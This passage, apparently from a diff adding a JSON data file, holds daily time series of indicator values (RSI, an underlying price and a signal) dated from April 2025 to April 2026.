+ [ + "2026-01-21", + 36.823267869226626 + ], + [ + "2026-01-22", + 38.00005996272037 + ], + [ + "2026-01-23", + 37.55348222767529 + ], + [ + "2026-01-26", + 37.94620143729745 + ], + [ + "2026-01-27", + 40.41425557937913 + ], + [ + "2026-01-28", + 39.5632057900014 + ], + [ + "2026-01-29", + 40.733650053584995 + ], + [ + "2026-01-30", + 43.30090185395253 + ], + [ + "2026-02-02", + 44.16677807854531 + ], + [ + "2026-02-03", + 50.208201965752444 + ], + [ + "2026-02-04", + 55.49868506972408 + ], + [ + "2026-02-05", + 59.41739054714819 + ], + [ + "2026-02-06", + 71.56154790981572 + ], + [ + "2026-02-09", + 70.5917840935929 + ], + [ + "2026-02-10", + 70.78338605691972 + ], + [ + "2026-02-11", + 71.11177740447215 + ], + [ + "2026-02-12", + 77.59012010682655 + ], + [ + "2026-02-13", + 77.22310869593919 + ], + [ + "2026-02-17", + 77.239369996201 + ], + [ + "2026-02-18", + 69.29805997695895 + ], + [ + "2026-02-19", + 64.73398940596563 + ], + [ + "2026-02-20", + 65.19366460718038 + ], + [ + "2026-02-23", + 67.57668141586936 + ], + [ + "2026-02-24", + 70.43429904892679 + ], + [ + "2026-02-25", + 73.6024651091713 + ], + [ + "2026-02-26", + 75.47468694498647 + ], + [ + "2026-02-27", + 75.15494464391716 + ], + [ + "2026-03-02", + 72.67657234476049 + ], + [ + "2026-03-03", + 72.95756436289024 + ], + [ + "2026-03-04", + 74.38767217855357 + ], + [ + "2026-03-05", + 67.2997839852621 + ], + [ + "2026-03-06", + 67.98427551092942 + ], + [ + "2026-03-09", + 61.35451582256988 + ], + [ + "2026-03-10", + 59.64922555939217 + ], + [ + "2026-03-11", + 59.192750216894474 + ], + [ + "2026-03-12", + 65.69598694507755 + ], + [ + "2026-03-13", + 56.56397564815959 + ], + [ + "2026-03-16", + 60.0972065507362 + ], + [ + "2026-03-17", + 60.74256287735105 + ], + [ + "2026-03-18", + 64.20723764854243 + ], + [ + "2026-03-19", + 64.10638009022904 + ], + [ + "2026-03-20", + 69.20026899865445 + ], + [ + "2026-03-23", + 70.85691302694244 + ], + [ + "2026-03-24", + 67.93702955762627 + ], + [ + "2026-03-25", + 63.16384119937998 + ], + [ + "2026-03-26", + 72.17250310469558 + ], + [ + "2026-03-27", + 78.4470799681123 + ], + [ + "2026-03-30", + 78.11585656408064 + ], + [ + "2026-03-31", + 100.0 + ], + [ + "2026-04-01", + 98.5302137488065 + ], + [ + "2026-04-02", + 98.66221129209394 + ], + [ + "2026-04-06", + 96.24742893669013 + ], + [ + "2026-04-07", + 92.50707935223707 + ], + [ + "2026-04-08", + 100.0 + ], + [ + "2026-04-09", + 100.0 + ], + [ + "2026-04-10", + 95.07542105120298 + ], + [ + "2026-04-13", + 95.22572845245315 + ], + [ + "2026-04-14", + 97.98210801635149 + ], + [ + "2026-04-15", + 99.92799311948839 + ], + [ + "2026-04-16", + 95.13746194320387 + ], + [ + "2026-04-17", + 95.52925432876931 + ], + [ + "2026-04-20", + 87.07640409081961 + ], + [ + "2026-04-21", + 87.66358264744083 + ], + [ + "2026-04-22", + 87.24541263749134 + ], + [ + "2026-04-23", + 89.23358282718529 + ] + ], + "rsi": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 99.77908928768267 + ], + [ + "2025-04-29", + 99.78950842717929 + ], + [ + "2025-04-30", + 99.69211114472606 + ], + [ + "2025-05-01", + 99.7223142497316 + ], + [ + "2025-05-02", + 99.75242789492086 + ], + [ + "2025-05-05", + 95.2410373274194 + ], + [ + "2025-05-06", + 88.5212658121989 + ], + [ + "2025-05-07", + 88.87472828889264 + ], + [ + "2025-05-08", + 89.77039459898722 + ], + [ + "2025-05-09", + 89.27396100176898 + ], + [ + "2025-05-12", + 92.17031340715137 + ], + [ + "2025-05-13", + 92.96662824333147 + ], + [ + "2025-05-14", + 93.26128284430723 + ], + [ + "2025-05-15", + 93.31690391019877 + ], + [ + "2025-05-16", + 93.54442239804814 + ], + [ + "2025-05-19", + 93.59635945009319 + ], + [ + "2025-05-20", + 90.85680768556904 + ], + [ + "2025-05-21", + 80.33443753605229 + ], + [ + "2025-05-22", + 80.65481300777148 + ], + [ + "2025-05-23", + 74.20030046877768 + ], + [ + "2025-05-27", + 78.79889165841433 + ], + [ + "2025-05-28", + 75.98634442135675 + ], + [ + "2025-05-29", + 76.38712642826677 + ], + [ + "2025-05-30", + 75.2991694094415 + ], + [ + "2025-06-02", + 77.05862643192204 + ], + [ + "2025-06-03", + 78.68933225960095 + ], + [ + "2025-06-04", + 79.2599449294256 + ], + [ + "2025-06-05", + 73.51992338544368 + ], + [ + "2025-06-06", + 75.93870864014568 + ], + [ + "2025-06-09", + 76.29331086253197 + ], + [ + "2025-06-10", + 77.87343762714161 + ], + [ + "2025-06-11", + 75.10853796317205 + ], + [ + "2025-06-12", + 75.75238461110786 + ], + [ + "2025-06-13", + 65.91168547110698 + ], + [ + "2025-06-16", + 70.43648367341308 + ], + [ + "2025-06-17", + 63.93988449834415 + ], + [ + "2025-06-18", + 63.830395000487684 + ], + [ + "2025-06-20", + 61.124208124520464 + ], + [ + "2025-06-23", + 65.11828890350552 + ], + [ + "2025-06-24", + 70.09038975843646 + ], + [ + "2025-06-25", + 70.84989602776346 + ], + [ + "2025-06-26", + 73.50659609816717 + ], + [ + "2025-06-27", + 74.4339430597013 + ], + [ + "2025-06-30", + 76.14127948099062 + ], + [ + "2025-07-01", + 69.58604264739866 + ], + [ + "2025-07-02", + 71.73336328219997 + ], + [ + "2025-07-03", + 74.49235464081471 + ], + [ + "2025-07-07", + 68.89414676197873 + ], + [ + "2025-07-08", + 69.07929104575007 + ], + [ + "2025-07-09", + 71.3922605984195 + ], + [ + "2025-07-10", + 70.23459758610358 + ], + [ + "2025-07-11", + 68.36915740238422 + ], + [ + "2025-07-14", + 69.76007001702988 + ], + [ + "2025-07-15", + 70.11901599477663 + ], + [ + "2025-07-16", + 70.53999039264795 + ], + [ + "2025-07-17", + 73.69761706136079 + ], + [ + "2025-07-18", + 72.69302793727888 + ], + [ + "2025-07-21", + 74.69499036815036 + ], + [ + "2025-07-22", + 69.21178112073197 + ], + [ + "2025-07-23", + 71.20736737327017 + ], + [ + "2025-07-24", + 72.11956005002996 + ], + [ + "2025-07-25", + 73.15755907558417 + ], + [ + "2025-07-28", + 74.48878804741611 + ], + [ + "2025-07-29", + 72.56211453422787 + ], + [ + "2025-07-30", + 73.20665503178788 + ], + [ + "2025-07-31", + 66.53938018590321 + ], + [ + "2025-08-01", + 48.83041714521239 + ], + [ + "2025-08-04", + 59.49150188574576 + ], + [ + "2025-08-05", + 54.8771344517752 + ], + [ + "2025-08-06", + 60.89051631800635 + ], + [ + "2025-08-07", + 62.36159905224683 + ], + [ + "2025-08-08", + 66.1535500192914 + ], + [ + "2025-08-11", + 63.93282773230302 + ], + [ + "2025-08-12", + 68.72179878430842 + ], + [ + "2025-08-13", + 68.90096004766343 + ], + [ + "2025-08-14", + 68.2479954800076 + ], + [ + "2025-08-15", + 64.51594020063126 + ], + [ + "2025-08-18", + 64.17501891470616 + ], + [ + "2025-08-19", + 53.7613528159363 + ], + [ + "2025-08-20", + 49.99036014105787 + ], + [ + "2025-08-21", + 47.22511723120888 + ], + [ + "2025-08-22", + 55.932164744221424 + ], + [ + "2025-08-25", + 54.10684486883164 + ], + [ + "2025-08-26", + 56.2412718145932 + ], + [ + "2025-08-27", + 57.06768816744587 + ], + [ + "2025-08-28", + 60.35664701191753 + ], + [ + "2025-08-29", + 52.32422607750387 + ], + [ + "2025-09-02", + 47.45731763305261 + ], + [ + "2025-09-03", + 51.939159304333586 + ], + [ + "2025-09-04", + 56.56573042430386 + ], + [ + "2025-09-05", + 57.278118234730776 + ], + [ + "2025-09-08", + 59.688792502266885 + ], + [ + "2025-09-09", + 61.069519840495325 + ], + [ + "2025-09-10", + 61.235151010076606 + ], + [ + "2025-09-11", + 64.15700335135661 + ], + [ + "2025-09-12", + 66.24826657009616 + ], + [ + "2025-09-15", + 69.92517524459407 + ], + [ + "2025-09-16", + 69.11759390821689 + ], + [ + "2025-09-17", + 67.14644947664385 + ], + [ + "2025-09-18", + 71.14222271806509 + ], + [ + "2025-09-19", + 73.74696620950398 + ], + [ + "2025-09-22", + 75.81667508320126 + ], + [ + "2025-09-23", + 69.18693052125357 + ], + [ + "2025-09-24", + 65.92746848032756 + ], + [ + "2025-09-25", + 62.073425236381986 + ], + [ + "2025-09-26", + 64.21245872265236 + ], + [ + "2025-09-29", + 66.51319698232234 + ], + [ + "2025-09-30", + 67.83640211122957 + ], + [ + "2025-10-01", + 70.07273313184133 + ], + [ + "2025-10-02", + 71.8855485528228 + ], + [ + "2025-10-03", + 67.36702023580156 + ], + [ + "2025-10-06", + 70.87004580409064 + ], + [ + "2025-10-07", + 65.51954367846942 + ], + [ + "2025-10-08", + 70.68183837526507 + ], + [ + "2025-10-09", + 69.48545971957161 + ], + [ + "2025-10-10", + 45.6484809640792 + ], + [ + "2025-10-13", + 55.376535990216645 + ], + [ + "2025-10-14", + 52.15414821576096 + ], + [ + "2025-10-15", + 55.114255972395775 + ], + [ + "2025-10-16", + 53.23979681947281 + ], + [ + "2025-10-17", + 56.08188756758957 + ], + [ + "2025-10-20", + 61.011026282234845 + ], + [ + "2025-10-21", + 60.85647820692386 + ], + [ + "2025-10-22", + 55.299321206806546 + ], + [ + "2025-10-23", + 58.800577627626176 + ], + [ + "2025-10-24", + 62.81802243375273 + ], + [ + "2025-10-27", + 68.40982209527833 + ], + [ + "2025-10-28", + 70.50895071526386 + ], + [ + "2025-10-29", + 71.70377420678216 + ], + [ + "2025-10-30", + 62.415961681807815 + ], + [ + "2025-10-31", + 63.97721715462972 + ], + [ + "2025-11-03", + 65.51481323461284 + ], + [ + "2025-11-04", + 54.78126552074134 + ], + [ + "2025-11-05", + 57.15572428877619 + ], + [ + "2025-11-06", + 49.14873921297974 + ], + [ + "2025-11-07", + 47.946262335965926 + ], + [ + "2025-11-10", + 56.04169993716807 + ], + [ + "2025-11-11", + 54.91003789029195 + ], + [ + "2025-11-12", + 54.55979514158867 + ], + [ + "2025-11-13", + 46.32544552927018 + ], + [ + "2025-11-14", + 46.640053355616196 + ], + [ + "2025-11-17", + 43.53348196224972 + ], + [ + "2025-11-18", + 39.52597982451596 + ], + [ + "2025-11-19", + 42.296751231072946 + ], + [ + "2025-11-20", + 35.34117075603504 + ], + [ + "2025-11-21", + 38.70474397951299 + ], + [ + "2025-11-24", + 48.58339946763734 + ], + [ + "2025-11-25", + 50.698530286733394 + ], + [ + "2025-11-26", + 53.65962356354232 + ], + [ + "2025-11-28", + 56.27738373632398 + ], + [ + "2025-12-01", + 54.88282576546817 + ], + [ + "2025-12-02", + 57.51547352324611 + ], + [ + "2025-12-03", + 58.339358277366436 + ], + [ + "2025-12-04", + 57.87811695437859 + ], + [ + "2025-12-05", + 59.39216893660349 + ], + [ + "2025-12-08", + 58.32554380781426 + ], + [ + "2025-12-09", + 58.83638675405215 + ], + [ + "2025-12-10", + 60.56710649175481 + ], + [ + "2025-12-11", + 58.46786285052085 + ], + [ + "2025-12-12", + 47.92776579106365 + ], + [ + "2025-12-15", + 45.64565348358937 + ], + [ + "2025-12-16", + 46.71897912944355 + ], + [ + "2025-12-17", + 38.955101226169354 + ], + [ + "2025-12-18", + 46.32483651373011 + ], + [ + "2025-12-19", + 52.01808467928173 + ], + [ + "2025-12-22", + 53.97651794417385 + ], + [ + "2025-12-23", + 55.88032604958241 + ], + [ + "2025-12-24", + 57.080309208964124 + ], + [ + "2025-12-26", + 57.04356223181616 + ], + [ + "2025-12-29", + 54.20812865794478 + ], + [ + "2025-12-30", + 52.8588917484584 + ], + [ + "2025-12-31", + 48.259671721082746 + ], + [ + "2026-01-02", + 47.23106638529288 + ], + [ + "2026-01-05", + 51.76236721896856 + ], + [ + "2026-01-06", + 56.271260338426885 + ], + [ + "2026-01-07", + 56.75235031861906 + ], + [ + "2026-01-08", + 53.034882333684926 + ], + [ + "2026-01-09", + 58.17146939598702 + ], + [ + "2026-01-12", + 58.58194684040501 + ], + [ + "2026-01-13", + 57.495240198545105 + ], + [ + "2026-01-14", + 50.27099917161809 + ], + [ + "2026-01-15", + 52.41725359277675 + ], + [ + "2026-01-16", + 51.85524673295821 + ], + [ + "2026-01-20", + 40.10138441473356 + ], + [ + "2026-01-21", + 48.00508717576394 + ], + [ + "2026-01-22", + 51.742489858882124 + ], + [ + "2026-01-23", + 53.32326065652028 + ], + [ + "2026-01-26", + 55.516992968273804 + ], + [ + "2026-01-27", + 59.7342590939735 + ], + [ + "2026-01-28", + 61.19465997233811 + ], + [ + "2026-01-29", + 57.14693180340061 + ], + [ + "2026-01-30", + 50.03711688303372 + ], + [ + "2026-02-02", + 53.55211354566656 + ], + [ + "2026-02-03", + 45.744064121066536 + ], + [ + "2026-02-04", + 38.90503044293363 + ], + [ + "2026-02-05", + 34.418260401042886 + ], + [ + "2026-02-06", + 44.410222770298255 + ], + [ + "2026-02-09", + 47.59227470304877 + ], + [ + "2026-02-10", + 45.866730434316345 + ], + [ + "2026-02-11", + 47.05628730276663 + ], + [ + "2026-02-12", + 39.880253325733364 + ], + [ + "2026-02-13", + 40.87692059055901 + ], + [ + "2026-02-17", + 40.526434629490204 + ], + [ + "2026-02-18", + 44.25394034473025 + ], + [ + "2026-02-19", + 42.76258332423113 + ], + [ + "2026-02-20", + 47.175317266175774 + ], + [ + "2026-02-23", + 42.30763301395807 + ], + [ + "2026-02-24", + 47.4091787320362 + ], + [ + "2026-02-25", + 53.45408549385589 + ], + [ + "2026-02-26", + 48.39511573723492 + ], + [ + "2026-02-27", + 47.135937507384185 + ], + [ + "2026-03-02", + 47.73673282810168 + ], + [ + "2026-03-03", + 43.41308729598565 + ], + [ + "2026-03-04", + 50.24869036531047 + ], + [ + "2026-03-05", + 48.97034658084585 + ], + [ + "2026-03-06", + 43.093129358125864 + ], + [ + "2026-03-09", + 48.87174689097982 + ], + [ + "2026-03-10", + 48.87874181013656 + ], + [ + "2026-03-11", + 48.82132860123777 + ], + [ + "2026-03-12", + 41.90931491367907 + ], + [ + "2026-03-13", + 39.84725203358295 + ], + [ + "2026-03-16", + 45.30015635547296 + ], + [ + "2026-03-17", + 47.55271755133225 + ], + [ + "2026-03-18", + 42.1831791165178 + ], + [ + "2026-03-19", + 41.066793780681316 + ], + [ + "2026-03-20", + 35.21569545249008 + ], + [ + "2026-03-23", + 40.75717730712975 + ], + [ + "2026-03-24", + 38.61431663986644 + ], + [ + "2026-03-25", + 41.76403617553607 + ], + [ + "2026-03-26", + 34.74864807841956 + ], + [ + "2026-03-27", + 30.3604374248239 + ], + [ + "2026-03-30", + 28.85514583514845 + ], + [ + "2026-03-31", + 42.378277353771566 + ], + [ + "2026-04-01", + 46.50901772628459 + ], + [ + "2026-04-02", + 46.894266842903015 + ], + [ + "2026-04-06", + 48.9735906173653 + ], + [ + "2026-04-07", + 49.02855980340954 + ], + [ + "2026-04-08", + 58.40813805688492 + ], + [ + "2026-04-09", + 60.25350667262469 + ], + [ + "2026-04-10", + 60.65699482956721 + ], + [ + "2026-04-13", + 63.52111179574423 + ], + [ + "2026-04-14", + 67.97449806870497 + ], + [ + "2026-04-15", + 70.97057444692919 + ], + [ + "2026-04-16", + 71.95622679398853 + ], + [ + "2026-04-17", + 74.50130669700691 + ], + [ + "2026-04-20", + 72.75337193575265 + ], + [ + "2026-04-21", + 70.6225321225262 + ], + [ + "2026-04-22", + 74.1899968539143 + ], + [ + "2026-04-23", + 71.01117716009101 + ] + ], + "underlying": [ + [ + "2025-04-24", + 25.888996124267578 + ], + [ + "2025-04-25", + 26.743024826049805 + ], + [ + "2025-04-28", + 26.723161697387695 + ], + [ + "2025-04-29", + 27.244516372680664 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18791961669922 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997262954711914 + ], + [ + "2025-05-06", + 28.173025131225586 + ], + [ + "2025-05-07", + 28.500736236572266 + ], + [ + "2025-05-08", + 29.34980010986328 + ], + [ + "2025-05-09", + 29.280284881591797 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.32997512817383 + ], + [ + "2025-05-14", + 34.93574523925781 + ], + [ + "2025-05-15", + 35.044979095458984 + ], + [ + "2025-05-16", + 35.476959228515625 + ], + [ + "2025-05-19", + 35.5713005065918 + ], + [ + "2025-05-20", + 35.19890594482422 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.90793228149414 + ], + [ + "2025-05-23", + 32.92976760864258 + ], + [ + "2025-05-27", + 35.223731994628906 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.940711975097656 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.3856086730957 + ], + [ + "2025-06-04", + 36.678558349609375 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.84737777709961 + ], + [ + "2025-06-09", + 37.011234283447266 + ], + [ + "2025-06-10", + 37.72623825073242 + ], + [ + "2025-06-11", + 37.33893585205078 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685989379883 + ], + [ + "2025-06-17", + 36.52463150024414 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.973487854003906 + ], + [ + "2025-06-23", + 37.090675354003906 + ], + [ + "2025-06-24", + 38.778873443603516 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.54050827026367 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276611328125 + ], + [ + "2025-07-02", + 41.07826232910156 + ], + [ + "2025-07-03", + 42.22844696044922 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.3421516418457 + ], + [ + "2025-07-09", + 42.198577880859375 + ], + [ + "2025-07-10", + 42.00438690185547 + ], + [ + "2025-07-11", + 41.68571853637695 + ], + [ + "2025-07-14", + 42.12886428833008 + ], + [ + "2025-07-15", + 42.23841094970703 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.34379196166992 + ], + [ + "2025-07-18", + 43.19441604614258 + ], + [ + "2025-07-21", + 43.85166549682617 + ], + [ + "2025-07-22", + 43.16951370239258 + ], + [ + "2025-07-23", + 43.73714065551758 + ], + [ + "2025-07-24", + 44.025936126708984 + ], + [ + "2025-07-25", + 44.2748908996582 + ], + [ + "2025-07-28", + 44.70808792114258 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.65829086303711 + ], + [ + "2025-07-31", + 43.9213752746582 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23505783081055 + ], + [ + "2025-08-07", + 44.683189392089844 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.23252868652344 + ], + [ + "2025-08-14", + 47.10307312011719 + ], + [ + "2025-08-15", + 46.43585968017578 + ], + [ + "2025-08-18", + 46.3761100769043 + ], + [ + "2025-08-19", + 44.4840202331543 + ], + [ + "2025-08-20", + 43.67241668701172 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.60850143432617 + ], + [ + "2025-08-26", + 45.12633514404297 + ], + [ + "2025-08-27", + 45.33047866821289 + ], + [ + "2025-08-28", + 46.15702438354492 + ], + [ + "2025-08-29", + 44.493980407714844 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.369503021240234 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.37112808227539 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.5860481262207 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399826049805 + ], + [ + "2025-09-17", + 48.960304260253906 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.142005920410156 + ], + [ + "2025-09-23", + 51.091400146484375 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.26162338256836 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.181880950927734 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.48590087890625 + ], + [ + "2025-10-08", + 54.26517105102539 + ], + [ + "2025-10-09", + 54.05086135864258 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.402610778808594 + ], + [ + "2025-10-15", + 51.43429183959961 + ], + [ + "2025-10-16", + 50.86113739013672 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.711952209472656 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.10247039794922 + ], + [ + "2025-10-27", + 58.028045654296875 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.36164093017578 + ], + [ + "2025-11-05", + 56.438167572021484 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.86113739013672 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30083084106445 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596603393555 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.1986083984375 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87641906738281 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.33173370361328 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080001831055 + ], + [ + "2025-12-09", + 55.83012390136719 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037536621094 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.83333969116211 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2025-04-24", + 465.0987243652344 + ], + [ + "2025-04-25", + 470.2835998535156 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.23931884765625 + ], + [ + "2025-04-30", + 473.1795959472656 + ], + [ + "2025-05-01", + 479.3596496582031 + ], + [ + "2025-05-02", + 486.4752502441406 + ], + [ + "2025-05-05", + 483.5892028808594 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.97186279296875 + ], + [ + "2025-05-08", + 485.9378967285156 + ], + [ + "2025-05-09", + 485.619384765625 + ], + [ + "2025-05-12", + 505.4036560058594 + ], + [ + "2025-05-13", + 513.1063842773438 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7487182617188 + ], + [ + "2025-05-16", + 518.9978637695312 + ], + [ + "2025-05-19", + 519.4954223632812 + ], + [ + "2025-05-20", + 517.7638549804688 + ], + [ + "2025-05-21", + 510.568603515625 + ], + [ + "2025-05-22", + 511.5240173339844 + ], + [ + "2025-05-23", + 506.78692626953125 + ], + [ + "2025-05-27", + 518.709228515625 + ], + [ + "2025-05-28", + 516.4102783203125 + ], + [ + "2025-05-29", + 517.4254150390625 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.689697265625 + ], + [ + "2025-06-03", + 524.7599487304688 + ], + [ + "2025-06-04", + 526.2228393554688 + ], + [ + "2025-06-05", + 522.261962890625 + ], + [ + "2025-06-06", + 527.3673095703125 + ], + [ + "2025-06-09", + 528.1436157226562 + ], + [ + "2025-06-10", + 531.6366577148438 + ], + 